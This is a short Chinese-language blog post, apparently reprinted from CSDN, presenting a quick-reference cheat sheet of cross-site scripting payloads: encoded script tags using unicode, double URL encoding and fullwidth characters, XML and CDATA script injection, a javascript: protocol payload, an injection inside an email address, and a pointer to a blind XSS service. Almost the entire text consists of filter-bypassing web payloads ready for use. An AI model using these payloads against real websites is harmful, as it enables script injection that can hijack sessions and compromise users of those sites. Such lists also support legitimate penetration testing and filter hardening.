当前位置：网站首页>各种 XSS Payload 速查清单

各种 XSS Payload 速查清单

2022-07-22 09:41:00 【Sumarua】

Blind XSS

https://xsshunter.com/

Encoding

%u003Cscript%u003Eprompt%u0028303%u0029%u003C/script%u003E

%253Cscript%253Ealert(1)%253C%252Fscript%253E

%uff1cscript%uff1ealert(1);%uff1c/script%uff1e

XML Based XSS

<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>

<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>

Where / is required after protocol

javascript://%250aalert(1)

XSS in email ID

"\"><s>test"@gmail.com

版权声明
本文为[Sumarua]所创，转载请带上原文链接，感谢
https://sumarua.blog.csdn.net/article/details/125860166